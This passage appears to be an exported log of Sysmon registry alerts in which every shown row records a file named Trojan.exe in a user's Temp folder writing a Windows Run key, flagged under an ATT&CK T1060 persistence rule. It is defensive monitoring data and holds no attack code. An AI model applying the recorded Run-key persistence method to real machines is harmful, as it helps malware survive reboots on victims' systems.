T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:09.799 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:09.803356600Z"",""eventRecordID"":""1596"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:09.799\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:09.799"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:21.915",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:08.767 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:08.770400200Z"",""eventRecordID"":""1595"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:08.767\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:08.767"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:21.404",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:07.721 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:07.723604100Z"",""eventRecordID"":""1594"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:07.721\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:07.721"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:21.263",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:06.705 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:06.721086900Z"",""eventRecordID"":""1590"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:06.705\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:06.705"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:20.979",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:05.659 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:05.662087900Z"",""eventRecordID"":""1588"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:05.659\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:05.659"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:17.824",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:04.642 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:04.648673500Z"",""eventRecordID"":""1584"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:04.642\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:04.642"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:16.759",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:03.618 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:03.624888500Z"",""eventRecordID"":""1583"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:03.618\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:03.618"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:15.753",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:02.581 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:02.583411800Z"",""eventRecordID"":""1581"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:02.581\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:02.581"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:14.688",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:01.564 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:01.566301200Z"",""eventRecordID"":""1579"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:01.564\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:01.564"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:13.678",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:26:00.549 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:26:00.551835500Z"",""eventRecordID"":""1578"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:26:00.549\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:26:00.549"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:12.662",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:59.533 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:59.544688200Z"",""eventRecordID"":""1576"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:59.533\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:59.533"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:11.633",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:58.517 +ProcessGuid: 